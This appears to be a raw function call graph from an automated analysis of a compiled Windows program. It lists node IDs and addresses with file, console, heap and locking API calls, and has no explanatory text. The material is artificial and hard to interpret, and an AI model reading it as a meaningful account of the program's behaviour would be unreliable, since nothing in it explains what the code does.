43565 812177 43586 82d834 19 API calls 43565->43586 43566->43565 43585 82d7d4 19 API calls 43566->43585 43570 856107 ___std_fs_directory_iterator_open@12 12 API calls 43569->43570 43571 856136 FindFirstFileExW 43570->43571 43572 856150 GetLastError 43571->43572 43573 85617f 43571->43573 43574 856160 FindFirstFileExW 43572->43574 43575 85615b 43572->43575 43573->43557 43574->43573 43576 856177 GetLastError 43574->43576 43575->43573 43575->43574 43576->43573 43578 8560fd GetLastError 43577->43578 43579 8560f9 43577->43579 43578->43579 43579->43557 43581 82d821 43580->43581 43582 82d82e 43580->43582 43581->43565 43587 82e2ac 19 API calls 43582->43587 43585->43565 43586->43561 43589 870f3f KiUserExceptionDispatcher 43588->43589 43590 870f12 43588->43590 43589->43549 43590->43589 43595 86f12e 43591->43595 43594->43543 43596 8111fa 43595->43596 43597 86f13b _Yarn 43595->43597 43596->43516 43597->43596 43598 86f168 43597->43598 43601 87f6d3 18 API calls __wsopen_s 43597->43601 43602 875640 43598->43602 43601->43598 43605 880123 43602->43605 43604 875658 43604->43596 43606 880157 43605->43606 43607 88012e RtlFreeHeap 43605->43607 43606->43604 43607->43606 43608 880143 43607->43608 43609 880149 GetLastError 43608->43609 43609->43606 43612 85621f 43610->43612 43611 856223 43627 86e288 43611->43627 43612->43611 43613 85628c 43612->43613 43615 856270 GetFileAttributesExW 43612->43615 43613->43611 43617 8564fd ___std_fs_open_handle@16 2 API calls 43613->43617 43615->43613 43618 856281 GetLastError 43615->43618 43616 8564ef 43616->43518 43626 8562ee 43617->43626 43618->43611 43619 855d9c ___std_fs_copy_file@12 8 API calls 43619->43611 43620 856422 GetFileInformationByHandle 43621 856435 43620->43621 43622 856353 GetLastError 43620->43622 43623 85647c FindFirstFileExW 43621->43623 43624 85641b 43621->43624 43622->43624 43623->43622 43625 8564a2 FindClose 43623->43625 43624->43619 43625->43624 43626->43620 43626->43622 43626->43624 43628 86e293 IsProcessorFeaturePresent 43627->43628 43629 86e291 43627->43629 43631 86e9ee 43628->43631 43629->43616 43634 86e9b2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43631->43634 43633 86ead1 43633->43616 43634->43633 43635 82be05 43636 82be0f 43635->43636 43637 82bf02 43636->43637 43647 81a282 43636->43647 43695 82e0ab 43636->43695 43699 829151 43636->43699 43756 823095 43636->43756 43805 81abfc 104 API calls 2 library calls 43636->43805 43806 81b653 87 API calls 2 library calls 43636->43806 43807 81c50c 79 API calls collate 43636->43807 43808 8204ad 79 API calls collate 43636->43808 43809 821bd6 87 API calls 2 library calls 43636->43809 43648 81a28c 43647->43648 43650 81a2c4 43648->43650 43858 86db91 EnterCriticalSection LeaveCriticalSection 43648->43858 43652 81a352 43650->43652 43859 86db91 EnterCriticalSection LeaveCriticalSection 43650->43859 43654 81a3de 43652->43654 43860 86db91 EnterCriticalSection LeaveCriticalSection 43652->43860 43656 81a472 43654->43656 43861 86db91 EnterCriticalSection LeaveCriticalSection 43654->43861 43658 81a503 43656->43658 43862 86db91 EnterCriticalSection LeaveCriticalSection 43656->43862 43660 81a597 43658->43660 43863 86db91 EnterCriticalSection LeaveCriticalSection 43658->43863 43662 81a628 43660->43662 43864 86db91 EnterCriticalSection LeaveCriticalSection 43660->43864 43667 81a6fe 43662->43667 43865 86db91 EnterCriticalSection LeaveCriticalSection 43662->43865 43665 81a758 43815 82e981 43665->43815 43810 82e8c7 43667->43810 43668 81a76d 43818 82e917 43668->43818 43670 81a785 43821 82df41 43670->43821 43673 82df41 collate 18 API calls 43674 81a799 43673->43674 43825 813174 43674->43825 43676 81a7e2 43683 81abb0 43676->43683 43831 8130c8 43676->43831 43677 82df41 collate 18 API calls 43678 81abd2 43677->43678 43680 82df41 collate 18 API calls 43678->43680 43681 81abe5 43680->43681 43681->43636 43682 812ac6 35 API calls 43693 81a820 43682->43693 43683->43677 43685 82e5d4 24 API calls 43685->43693 43688 82e917 19 API calls 43688->43693 43689 82e981 19 API calls 43689->43693 43690 82e143 18 API calls 43690->43693 43692 82df41 18 API calls collate 43692->43693 43693->43682 43693->43683 43693->43685 43693->43688 43693->43689 43693->43690 43693->43692 43694 82e0ab messages 19 API calls 43693->43694 43843 82e9ec 43693->43843 43848 8183df 43693->43848 43852 813112 43693->43852 43866 86db91 EnterCriticalSection LeaveCriticalSection 43693->43866 43694->43693 43696 82e0c6 43695->43696 43697 82f70f messages 19 API calls 43696->43697 43698 82e0d8 _Yarn 43696->43698 43697->43698 43698->43636 43700 82915b 43699->43700 43701 813174 35 API calls 43700->43701 43705 829199 43701->43705 43702 82a311 43703 82df41 collate 18 API calls 43702->43703 43704 82a319 43703->43704 43704->43636 43705->43702 43706 82e8c7 19 API calls 43705->43706 43707 8291ec 43706->43707 44221 82fa3b 43707->44221 43709 829201 43710 82e917 19 API calls 43709->43710 43711 829218 43710->43711 43712 82fa3b 19 API calls 43711->43712 43713 82922d 43712->43713 43714 82df41 collate 18 API calls 43713->43714 43715 829240 43714->43715 43716 82df41 collate 18 API calls 43715->43716 43717 82924b 43716->43717 43718 82df41 collate 18 API calls 43717->43718 43719 829253 43718->43719 43720 82df41 collate 18 API calls 43719->43720 43721 82925e 43720->43721 43722 82df41 collate 18 API calls 43721->43722 43723 829269 43722->43723 43724 8130c8 38 API calls 43723->43724 43742 8292b7 43724->43742 43726 82a2d9 43727 82df41 collate 18 API calls 43726->43727 43728 82a2fb 43727->43728 43729 82df41 collate 18 API calls 43728->43729 43731 82a306 43729->43731 43730 813112 36 API calls 43730->43742 43732 82df41 collate 18 API calls 43731->43732 43732->43702 43734 82e5d4 24 API calls 43734->43742 43735 86db91 EnterCriticalSection LeaveCriticalSection 43735->43742 43737 82d8d6 19 API calls 43737->43742 43738 82e143 18 API calls 43738->43742 43739 813225 37 API calls 43739->43742 43740 82d9c4 19 API calls 43740->43742 43741 813139 33 API calls 43741->43742 43742->43726 43742->43730 43742->43734 43742->43735 43742->43737 43742->43738 43742->43739 43742->43740 43742->43741 43743 82df41 18 API calls collate 43742->43743 43745 82d9e5 19 API calls 43742->43745 43746 82e981 19 API calls 43742->43746 43747 82e8c7 19 API calls 43742->43747 43749 826a63 82 API calls 43742->43749 43750 82e9ec 19 API calls 43742->43750 43751 82e917 19 API calls 43742->43751 43752 82fa3b 19 API calls 43742->43752 43755 82e0ab 19 API calls messages 43742->43755 44229 812a7c 43742->44229 44235 827009 43742->44235 44433 812ac6 43742->44433 44440 82a328 EnterCriticalSection LeaveCriticalSection 43742->44440 44441 82a3a4 EnterCriticalSection LeaveCriticalSection 43742->44441 44442 82a420 EnterCriticalSection LeaveCriticalSection 43742->44442 44443 82a49c EnterCriticalSection LeaveCriticalSection 43742->44443 43743->43742 43745->43742 43746->43742 43747->43742 43749->43742 43750->43742 43751->43742 43752->43742 43755->43742 43761 82309f 43756->43761 43757 8232ea 43762 82332c 43757->43762 45304 86db91 EnterCriticalSection LeaveCriticalSection 43757->45304 43759 82e8c7 19 API calls 43760 823383 43759->43760 43764 813174 35 API calls 43760->43764 43761->43757 43768 823126 43761->43768 45302 86db91 EnterCriticalSection LeaveCriticalSection 43761->45302 43762->43759 43767 8233a9 43764->43767 43766 823dea 43767->43766 43769 82e0ab messages 19 API calls 43767->43769 45293 82bb72 43768->45293 43798 8233d2 43769->43798 43770 8232da 43771 82df41 collate 18 API calls 43770->43771 43771->43757 43772 82318c 43772->43770 43777 8231fe 43772->43777 45303 86db91 EnterCriticalSection LeaveCriticalSection 43772->45303 43774 82e9ec 19 API calls 43775 823254 43774->43775 43776 82e917 19 API calls 43775->43776 43778 82326a 43776->43778 43777->43774 43779 82bb72 20 API calls 43778->43779 43780 82327f 43779->43780 43781 823299 43780->43781 43782 82e143 18 API calls 43780->43782 43783 82df41 collate 18 API calls 43781->43783 43782->43781 43784 8232a4 43783->43784 43785 82df41 collate 18 API calls 43784->43785 43786 8232b3 43785->43786 43786->43770 43789 8232c3 43786->43789 43787 823dc5 43788 82df41 collate 18 API calls 43787->43788 43788->43766 43790 82df41 collate 18 API calls 43789->43790 43792 8232cb 43790->43792 43791 812ebb 25 API calls 43791->43798 43792->43636 43793 812a7c 35 API calls 43793->43798 43794 82e5d4 24 API calls 43794->43798 43795 818e25 50 API calls 43795->43798 43796 82e143 18 API calls 43796->43798 43797 82e9ec 19 API calls 43797->43798 43798->43766 43798->43787 43798->43791 43798->43793 43798->43794 43798->43795 43798->43796 43798->43797 43799 82df41 18 API calls collate 43798->43799 43800 82d8d6 19 API calls 43798->43800 43801 82e917 19 API calls 43798->43801 43802 82d9e5 19 API calls 43798->43802 43803 82da01 19 API calls 43798->43803 43804 86db91 EnterCriticalSection LeaveCriticalSection 43798->43804 43799->43798 43800->43798 43801->43798 43802->43798 43803->43798 43804->43798 43805->43636 43806->43636 43807->43636 43808->43636 43809->43636 43811 82e8dd 43810->43811 43811->43811 43814 82e8f1 43811->43814 43867 8112de 19 API calls 2 library calls 43811->43867 43813 82e916 43814->43665 43868 82d9e5 43815->43868 43817 82e995 collate 43817->43668 43877 82d9c4 43818->43877 43820 82e92b collate 43820->43670 43822 81a78e 43821->43822 43823 82df4c 43821->43823 43822->43673 43881 82f6e3 43823->43881 43886 813254 43825->43886 43827 8131ad 43827->43676 43828 81318c 43828->43827 43890 8129c2 24 API calls Concurrency::cancel_current_task 43828->43890 43832 8130d2 43831->43832 43891 82e802 43832->43891 43834 8130f1 43834->43693 43835 8130ec 43835->43834 43899 81290a __EH_prolog2 43835->43899 43844 82e9ff 43843->43844 43844->43844 43845 82ea19 43844->43845 44024 8112de 19 API calls 2 library calls 43844->44024 43845->43693 43847 82ea3c 43849 8183e6 43848->43849 43850 8183ed 43848->43850 43849->43693 43850->43849 44025 817d35 43850->44025 44184 812fbd 43852->44184 43854 813121 43855 813125 43854->43855 44195 812839 __EH_prolog2 43854->44195 43855->43693 43858->43650 43859->43652 43860->43654 43861->43656 43862->43658 43863->43660 43864->43662 43865->43667 43866->43693 43867->43813 43869 82d9f4 43868->43869 43872 82e052 43869->43872 43871 82d9fd 43871->43817 43873 82e092 43872->43873 43875 82e068 std::locale::_Locimp::_Makeushloc 43872->43875 43876 82f62f 19 API calls 4 library calls 43873->43876 43875->43871 43876->43875 43878 82d9ce 43877->43878 43878->43878 43879 82e052 19 API calls 43878->43879 43880 82d9e0 43879->43880 43880->43820 43882 82f6fd codecvt 43881->43882 43883 82f6f0 43881->43883 43882->43822 43885 8112ba 18 API calls 2 library calls 43883->43885 43885->43882 43887 81326e 43886->43887 43888 8561b5 21 API calls 43887->43888 43889 81327e 43888->43889 43889->43828 43892 82e80c 43891->43892 43893 812caf 32 API calls 43892->43893 43894 82e824 43893->43894 43895 86dc67 moneypunct 19 API calls 43894->43895 43897 82e837 43894->43897 43895->43897 43896 856107 ___std_fs_directory_iterator_open@12 12 API calls 43898 82e8a0 43896->43898 43897->43896 43898->43835 43900 812929 43899->43900 43905 812525 43900->43905 43906 81252f 43905->43906 43911 81137e 43906->43911 43912 811388 43911->43912 43913 82e0ab messages 19 API calls 43912->43913 43914 8113a6 43913->43914 43915 8113c5 43914->43915 43916 82e052 19 API calls 43914->43916 43916->43915 44024->43847 44026 817d56 44025->44026 44063 817d4c _Yarn 44025->44063 44026->44063 44064 81799d 44026->44064 44028 817dd4 _Yarn _strlen 44028->44063 44063->43849 44065 8179d1 CreateFileA 44064->44065 44066 8179ca 44064->44066 44065->44066 44067 8179f4 44065->44067 44066->44028 44185 812fd8 44184->44185 44186 813038 44185->44186 44187 812fff 44185->44187 44190 812fde 44185->44190 44205 812f83 44186->44205 44189 812bf0 32 API calls 44187->44189 44193 813034 44189->44193 44190->43854 44191 856107 12 API calls ___std_fs_directory_iterator_open@12 44191->44193 44193->44190 44193->44191 44194 812f83 2 API calls 44193->44194 44210 8121bf 44193->44210 44194->44193 44196 812858 44195->44196 44206 8560e6 ___std_fs_directory_iterator_advance@8 2 API calls 44205->44206 44207 812f94 44206->44207 44222 82fa72 44221->44222 44223 82fa77 _Yarn std::locale::_Locimp::_Makeushloc collate 44222->44223 44224 82fb64 44222->44224 44225 82faff 44222->44225 44223->43709 44444 8112de 19 API calls 2 library calls 44224->44444 44228 82f70f messages 19 API calls 44225->44228 44227 82fb69 44228->44223 44230 812b2d 21 API calls 44229->44230 44232 812a94 44230->44232 44231 812aaa 44231->43742 44232->44231 44233 81290a 24 API calls 44232->44233 44234 812ac5 44233->44234 44236 827013 44235->44236 44237 813174 35 API calls 44236->44237 44243 827051 44237->44243 44238 828ee5 44239 82df41 collate 18 API calls 44238->44239 44240 828eed 44239->44240 44241 82df41 collate 18 API calls 44240->44241 44242 828ef5 44241->44242 44242->43742 44243->44238 44244 827392 44243->44244 44246 82e0ab messages 19 API calls 44243->44246 44459 8559c7 44244->44459 44248 8270db 44246->44248 44445 818e25 44248->44445 44249 828ecd 44508 854cec 44249->44508 44251 8273c4 44253 827e14 44251->44253 44254 8273cd 44251->44254 44268 827e6e 44253->44268 44556 86db91 EnterCriticalSection LeaveCriticalSection 44253->44556 44271 82741a 44254->44271 44328 8288ab 44254->44328 44550 86db91 EnterCriticalSection LeaveCriticalSection 44254->44550 44256 82df41 collate 18 API calls 44256->44238 44258 83ea32 14 API calls 44258->44249 44259 8270e3 44265 82e0ab messages 19 API calls 44259->44265 44282 8271af 44259->44282 44260 8288b0 44261 84c9fb 19 API calls 44260->44261 44263 8288de 44261->44263 44266 828eba 44263->44266 44267 8288ee 44263->44267 44272 82718c 44265->44272 44275 82d9c4 19 API calls 44266->44275 44273 82d9c4 19 API calls 44267->44273 44291 827ec4 44268->44291 44557 82902e EnterCriticalSection LeaveCriticalSection 44268->44557 44269 827383 44274 82df41 collate 18 API calls 44269->44274 44462 84c9fb 44271->44462 44278 82e0ab messages 19 API calls 44272->44278 44305 8288f8 44273->44305 44274->44244 44275->44328 44277 82772e 44294 827769 44277->44294 44551 86db91 EnterCriticalSection LeaveCriticalSection 44277->44551 44280 8271a6 44278->44280 44279 827ef1 44304 827f36 44279->44304 44558 86db91 EnterCriticalSection LeaveCriticalSection 44279->44558 44541 818dc6 44280->44541 44282->44269 44288 82e0ab messages 19 API calls 44282->44288 44284 82d9c4 19 API calls 44287 8277bd 44284->44287 44286 83eedb 19 API calls 44286->44305 44496 83ea32 44287->44496 44292 827360 44288->44292 44297 84c9fb 19 API calls 44291->44297 44298 82e0ab messages 19 API calls 44292->44298 44293 83f301 8 API calls 44299 827485 44293->44299 44294->44284 44295 82e9ec 19 API calls 44300 827f8f 44295->44300 44431 827ffd 44297->44431 44303 82737a 44298->44303 44299->44287 44299->44293 44310 82ba52 22 API calls 44299->44310 44320 86db91 EnterCriticalSection LeaveCriticalSection 44299->44320 44329 82d9e5 19 API calls 44299->44329 44366 82e917 19 API calls 44299->44366 44375 82df41 18 API calls collate 44299->44375 44474 83eedb 44299->44474 44301 82e917 19 API calls 44300->44301 44306 827fa1 44301->44306 44308 818dc6 39 API calls 44303->44308 44304->44295 44305->44286 44322 83f301 8 API calls 44305->44322 44305->44328 44344 82e0ab messages 19 API calls 44305->44344 44362 82ba52 22 API calls 44305->44362 44376 86db91 EnterCriticalSection LeaveCriticalSection 44305->44376 44379 82e9ec 19 API calls 44305->44379 44383 82e981 19 API calls 44305->44383 44397 82e917 19 API calls 44305->44397 44405 82fa3b 19 API calls 44305->44405 44411 82d9e5 19 API calls 44305->44411 44423 82df41 18 API calls collate 44305->44423 44569 83f23a 8 API calls 44305->44569 44570 8228ae 20 API calls 3 library calls 44305->44570 44571 82da01 44305->44571 44309 827fba 44306->44309 44559 82e143 44306->44559 44307 8277cc 44313 84c9fb 19 API calls 44307->44313 44308->44269 44312 82df41 collate 18 API calls 44309->44312 44310->44299 44315 827fc5 44312->44315 44317 827805 44313->44317 44314 83eedb 19 API calls 44314->44431 44318 82df41 collate 18 API calls 44315->44318 44316 8283fe 44319 828891 44316->44319 44330 82e8c7 19 API calls 44316->44330 44317->44328 44337 82785b 44317->44337 44552 86db91 EnterCriticalSection LeaveCriticalSection 44317->44552 44318->44291 44321 82df41 collate 18 API calls 44319->44321 44320->44299 44323 82889c 44321->44323 44322->44305 44326 82df41 collate 18 API calls 44323->44326 44326->44328 44327 82d9c4 19 API calls 44432 8278b2 44327->44432 44328->44258 44329->44299 44334 82845f 44330->44334 44331 83eedb 19 API calls 44331->44432 44336 82fa3b 19 API calls 44334->44336 44335 83f301 8 API calls 44335->44431 44339 828474 44336->44339 44337->44327 44340 82e917 19 API calls 44339->44340 44341 82848e 44340->44341 44342 82fa3b 19 API calls 44341->44342 44345 8284a3 44342->44345 44343 82e0ab messages 19 API calls 44343->44431 44344->44305 44346 82df41 collate 18 API calls 44345->44346 44350 8284ae 44346->44350 44347 82e0ab messages 19 API calls 44347->44432 44351 82df41 collate 18 API calls 44350->44351 44353 8284b9 44351->44353 44355 82df41 collate 18 API calls 44353->44355 44354 82e143 18 API calls 44354->44431 44362->44305 44366->44299 44370 83f301 8 API calls 44370->44432 44372 82df41 18 API calls collate 44372->44431 44375->44299 44376->44305 44379->44305 44381 86db91 EnterCriticalSection LeaveCriticalSection 44381->44432 44382 82e9ec 19 API calls 44382->44432 44383->44305 44386 82e981 19 API calls 44386->44432 44397->44305 44401 82fa3b 19 API calls 44401->44432 44405->44305 44407 82e917 19 API calls 44407->44432 44411->44305 44418 82d9e5 19 API calls 44418->44432 44422 82df41 18 API calls collate 44422->44432 44423->44305 44429 82e8c7 19 API calls 44429->44431 44430 82d9e5 19 API calls 44430->44431 44431->44314 44431->44316 44431->44335 44431->44343 44431->44354 44431->44372 44431->44429 44431->44430 44562 86db91 EnterCriticalSection LeaveCriticalSection 44431->44562 44563 83f23a 8 API calls 44431->44563 44564 8228ae 20 API calls 3 library calls 44431->44564 44432->44328 44432->44331 44432->44347 44432->44370 44432->44381 44432->44382 44432->44386 44432->44401 44432->44407 44432->44418 44432->44422 44553 83f23a 8 API calls 44432->44553 44554 8228ae 20 API calls 3 library calls 44432->44554 44555 82ba52 22 API calls 2 library calls 44432->44555 44434 812ae7 44433->44434 44437 812adc 44433->44437 44435 8561b5 21 API calls 44434->44435 44436 812b11 44435->44436 44436->44437 44438 81290a 24 API calls 44436->44438 44437->43742 44439 812b2c 44438->44439 44440->43742 44441->43742 44442->43742 44443->43742 44444->44227 44446 818e2f 44445->44446 44575 872eaf 44446->44575 44448 818e69 44450 818e9a 44448->44450 44456 818e9f collate 44448->44456 44458 82df67 19 API calls 44448->44458 44578 87565b 44448->44578 44583 875c67 44448->44583 44586 8731c5 44450->44586 44451 82df41 collate 18 API calls 44452 818ed9 44451->44452 44455 82df41 collate 18 API calls 44452->44455 44457 818ee1 44455->44457 44456->44451 44457->44259 44458->44448 44819 8556e8 44459->44819 44463 84ca0c 44462->44463 44473 82747a 44463->44473 45062 8308c1 EnterCriticalSection GetCurrentThreadId 44463->45062 44465 84ca1d 45063 836587 44465->45063 44471 84ca43 45127 8308e2 LeaveCriticalSection 44471->45127 44473->44277 44473->44299 44475 83f001 44474->44475 44476 83eef5 44474->44476 44475->44299 45205 8308c1 EnterCriticalSection GetCurrentThreadId 44476->45205 44478 83ef04 45206 83ed15 44478->45206 44480 83efd8 45224 830af7 8 API calls 44480->45224 44482 83ef89 44482->44480 45222 83ca37 8 API calls 44482->45222 44483 83eff7 45225 8308e2 LeaveCriticalSection 44483->45225 44484 84c9fb 19 API calls 44493 83ef0c 44484->44493 44487 83efb7 44488 8306db 5 API calls 44487->44488 44490 83efc6 44488->44490 44490->44480 44493->44480 44493->44482 44493->44484 44495 83ed15 8 API calls 44493->44495 45219 83f849 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection RtlFreeHeap GetLastError 44493->45219 45220 83e113 14 API calls 44493->45220 45221 83ea62 14 API calls 44493->45221 44495->44493 44497 8277c6 44496->44497 44498 83ea3f 44496->44498 44504 8290b3 44497->44504 45252 8308c1 EnterCriticalSection GetCurrentThreadId 44498->45252 44500 83ea4a 45253 83e113 14 API calls 44500->45253 44502 83ea52 45254 8308e2 LeaveCriticalSection 44502->45254 44505 829110 44504->44505 44507 82911c 44504->44507 45255 86db91 EnterCriticalSection LeaveCriticalSection 44505->45255 44507->44307 44509 854d00 44508->44509 44521 828ed9 44508->44521 44509->44521 45256 8308c1 EnterCriticalSection GetCurrentThreadId 44509->45256 44511 854d1c 44512 84874c 5 API calls 44511->44512 44513 854d26 44512->44513 44514 854d37 44513->44514 44520 854d57 44513->44520 45282 8321f9 8 API calls 44514->45282 44516 854d96 44517 84874c 5 API calls 44516->44517 44523 854d9f 44517->44523 44518 854d44 45283 8308e2 LeaveCriticalSection 44518->45283 44520->44516 45257 837744 44520->45257 44521->44256 44524 8306db 5 API calls 44523->44524 44525 854dca 44523->44525 44524->44523 44526 8306db 5 API calls 44525->44526 44529 854e0c 44525->44529 44526->44525 44527 8306db 5 API calls 44527->44529 44528 854e45 45284 8321f9 8 API calls 44528->45284 44529->44527 44529->44528 44531 8306db 5 API calls 44533 854e97 44531->44533 44532 854e63 44532->44531 44534 8306db 5 API calls 44533->44534 44542 872eaf 20 API calls 44541->44542 44544 818de1 44542->44544 44543 818e08 44545 82df41 collate 18 API calls 44543->44545 44544->44543 44546 8731c5 39 API calls 44544->44546 44547 818e17 44545->44547 44546->44543 44548 82df41 collate 18 API calls 44547->44548 44549 818e1f 44548->44549 44549->44282 44550->44271 44551->44294 44552->44337 44553->44432 44554->44432 44555->44432 44556->44268 44557->44279 44558->44304 44560 82df41 collate 18 API calls 44559->44560 44561 82e14f collate 44560->44561 44561->44309 44562->44431 44563->44431 44564->44431 44569->44305 44570->44305 44572 82da22 44571->44572 44573 82da0e 44571->44573 44572->44305 44574 82e009 collate 19 API calls 44573->44574 44574->44572 44597 872df8 44575->44597 44577 872ec1 44577->44448 44579 875667 44578->44579 44580 87567b 44578->44580 44638 873529 18 API calls _Deallocate 44579->44638 44580->44448 44582 875677 44582->44448 44639 875c84 44583->44639 44585 875c7f 44585->44448 44587 8731d1 CallCatchBlock 44586->44587 44588 8731db 44587->44588 44589 8731f0 44587->44589 44735 873529 18 API calls _Deallocate 44588->44735 44593 8731eb 44589->44593 44720 8808d8 EnterCriticalSection 44589->44720 44592 87320d 44721 87314e 44592->44721 44593->44456 44595 873218 44736 87323f LeaveCriticalSection 44595->44736 44598 872e04 CallCatchBlock 44597->44598 44599 872e0b 44598->44599 44600 872e2b 44598->44600 44612 873529 18 API calls _Deallocate 44599->44612 44603 872e1b 44600->44603 44604 880900 44600->44604 44603->44577 44605 88090c CallCatchBlock 44604->44605 44613 87703f EnterCriticalSection 44605->44613 44607 88091a 44614 8809a4 44607->44614 44612->44603 44613->44607 44621 8809c7 44614->44621 44615 880927 44625 880960 44615->44625 44616 880a1f 44630 8800c6 44616->44630 44618 880a28 44620 880123 _free 2 API calls 44618->44620 44622 880a31 44620->44622 44621->44615 44621->44616 44621->44621 44628 8808d8 EnterCriticalSection 44621->44628 44629 8808ec LeaveCriticalSection 44621->44629 44622->44615 44635 8808d8 EnterCriticalSection 44622->44635 44637 877087 LeaveCriticalSection 44625->44637 44627 88094b 44627->44603 44628->44621 44629->44621 44633 8800d3 std::_Locinfo::_W_Getdays 44630->44633 44631 8800fe RtlAllocateHeap 44632 880111 44631->44632 44631->44633 44632->44618 44633->44631 44633->44632 44636 87d068 EnterCriticalSection LeaveCriticalSection moneypunct 44633->44636 44635->44615 44636->44633 44637->44627 44638->44582 44641 875c90 CallCatchBlock 44639->44641 44640 875cc8 44640->44585 44641->44640 44642 875cda 44641->44642 44645 875ca3 __cftof 44641->44645 44648 8808d8 EnterCriticalSection 44642->44648 44644 875ce4 44649 875a81 44644->44649 44656 873529 18 API calls _Deallocate 44645->44656 44648->44644 44653 875a92 __fread_nolock __cftof 44649->44653 44655 875aae 44649->44655 44651 875a9e __cftof 44657 873529 18 API calls _Deallocate 44651->44657 44653->44651 44653->44655 44658 88117f 44653->44658 44663 8844f6 44653->44663 44655->44640 44656->44640 44657->44655 44659 88118b 44658->44659 44660 8811a0 44658->44660 44702 873529 18 API calls _Deallocate 44659->44702 44660->44653 44662 88119b 44662->44653 44664 884508 44663->44664 44665 884520 44663->44665 44664->44653 44665->44664 44666 88456b 44665->44666 44668 88459a 44665->44668 44717 873529 18 API calls _Deallocate 44666->44717 44669 8845b3 44668->44669 44670 88460a 44668->44670 44674 8845ce 44668->44674 44672 8845b8 44669->44672 44669->44674 44709 88255c 44670->44709 44703 88c903 44672->44703 44673 884621 44676 880123 _free 2 API calls 44673->44676 44708 873529 18 API calls _Deallocate 44674->44708 44678 88462a 44676->44678 44677 884761 44680 8847d7 44677->44680 44683 88477a GetConsoleMode 44677->44683 44681 880123 _free 2 API calls 44678->44681 44682 8847db ReadFile 44680->44682 44685 884631 44681->44685 44686 88484f GetLastError 44682->44686 44687 8847f5 44682->44687 44683->44680 44684 88478b 44683->44684 44684->44682 44688 884791 ReadConsoleW 44684->44688 44699 8845e5 __fread_nolock 44685->44699 44686->44699 44687->44686 44693 880123 _free 2 API calls 44693->44664 44699->44693 44702->44662 44704 88c910 44703->44704 44706 88c91d 44703->44706 44704->44677 44705 88c929 44705->44677 44706->44705 44718 873529 18 API calls _Deallocate 44706->44718 44708->44699 44711 882598 44709->44711 44712 88256a std::_Locinfo::_W_Getdays 44709->44712 44710 882585 RtlAllocateHeap 44710->44711 44710->44712 44711->44673 44712->44710 44712->44711 44719 87d068 EnterCriticalSection LeaveCriticalSection moneypunct 44712->44719 44717->44664 44718->44704 44719->44712 44720->44592 44722 873170 44721->44722 44723 87315b 44721->44723 44733 87316b 44722->44733 44737 8813c3 44722->44737 44754 873529 18 API calls _Deallocate 44723->44754 44729 88117f __fread_nolock 18 API calls 44730 873193 44729->44730 44747 881056 44730->44747 44732 873199 44732->44733 44734 880123 _free 2 API calls 44732->44734 44733->44595 44734->44733 44735->44593 44736->44593 44738 8813db 44737->44738 44739 873185 44737->44739 44738->44739 44740 88117f __fread_nolock 18 API calls 44738->44740 44743 8811a6 44739->44743 44741 8813f9 44740->44741 44755 881f2a 44741->44755 44744 8811bd 44743->44744 44745 87318d 44743->44745 44744->44745 44746 880123 _free 2 API calls 44744->44746 44745->44729 44746->44745 44748 88107c 44747->44748 44749 881067 44747->44749 44750 8810c5 44748->44750 44751 8810a3 44748->44751 44749->44732 44796 873529 18 API calls _Deallocate 44750->44796 44792 880fca 44751->44792 44754->44733 44756 881f36 CallCatchBlock 44755->44756 44757 881ff1 44756->44757 44758 881f88 44756->44758 44761 881f3e 44756->44761 44780 873529 18 API calls _Deallocate 44757->44780 44758->44761 44762 88201c 44758->44762 44761->44739 44763 88203e 44762->44763 44779 88205a 44762->44779 44764 882092 44763->44764 44768 882042 44763->44768 44779->44761 44780->44761 44796->44749 44863 830929 44819->44863 44821 855700 44824 85571f 44821->44824 44866 83082c 44821->44866 44825 8273aa 44824->44825 44830 854cec 14 API calls 44824->44830 44825->44249 44825->44251 44825->44260 44826 855727 44876 8308c1 EnterCriticalSection GetCurrentThreadId 44826->44876 44827 855719 44908 8306db 44827->44908 44830->44825 44831 85572d 44877 8303c5 44831->44877 44834 8557d6 44916 8321f9 8 API calls 44834->44916 44835 8557fd 44884 8555b2 44835->44884 44839 8555b2 8 API calls 44841 855834 44839->44841 44842 8555b2 8 API calls 44841->44842 44862 8557f5 44841->44862 44862->44824 44918 8308e2 LeaveCriticalSection 44862->44918 44922 830614 44863->44922 44865 830933 __cftof 44865->44821 44867 830839 44866->44867 44868 830853 44866->44868 44869 830929 3 API calls 44867->44869 44871 830877 44868->44871 44872 830864 Sleep 44868->44872 44873 830875 44868->44873 44870 830841 44869->44870 44870->44873 44874 830847 InitializeCriticalSection 44870->44874 44875 830880 InitializeCriticalSection 44871->44875 44872->44868 44873->44826 44873->44827 44874->44873 44875->44873 44875->44875 44876->44831 44878 83082c 6 API calls 44877->44878 44879 8303d1 44878->44879 44942 8308c1 EnterCriticalSection GetCurrentThreadId 44879->44942 44881 8303d9 44943 8308e2 LeaveCriticalSection 44881->44943 44883 830427 44883->44834 44883->44835 44885 85561c 44884->44885 44888 8555cd _strlen 44884->44888 44886 855624 44885->44886 44885->44888 44945 8321f9 8 API calls 44886->44945 44889 84b94a 8 API calls 44888->44889 44890 8555e4 44889->44890 44891 855604 44890->44891 44897 85563c _strlen 44890->44897 44944 8321f9 8 API calls 44891->44944 44892 84b94a 8 API calls 44894 8556b0 44892->44894 44895 855611 44895->44839 44895->44862 44897->44892 44909 8306e6 44908->44909 44915 830717 44908->44915 45060 8308c1 EnterCriticalSection GetCurrentThreadId 44909->45060 44911 8306f7 44912 875640 _Yarn 2 API calls 44911->44912 44913 83070c 44912->44913 45061 8308e2 LeaveCriticalSection 44913->45061 44915->44824 44916->44862 44918->44824 44923 83062b 44922->44923 44931 8306d1 44922->44931 44932 8304e2 44923->44932 44927 830660 _Yarn 44930 830677 _Yarn 44927->44930 44939 8305aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 44927->44939 44940 8308e2 LeaveCriticalSection 44930->44940 44931->44865 44933 8304eb 44932->44933 44934 8304f2 44932->44934 44935 83082c 6 API calls 44933->44935 44941 8308c1 EnterCriticalSection GetCurrentThreadId 44934->44941 44935->44934 44937 8304fe 44937->44927 44938 8305aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 44937->44938 44938->44927 44939->44930 44940->44931 44941->44937 44942->44881 44943->44883 44944->44895 44945->44895 45060->44911 45061->44915 45062->44465 45064 836624 45063->45064 45065 83659d 45063->45065 45068 84c6cf 45064->45068 45065->45064 45128 8308e2 LeaveCriticalSection 45065->45128 45129 8308c1 EnterCriticalSection GetCurrentThreadId 45065->45129 45070 84c736 __cftof 45068->45070 45081 84c6f3 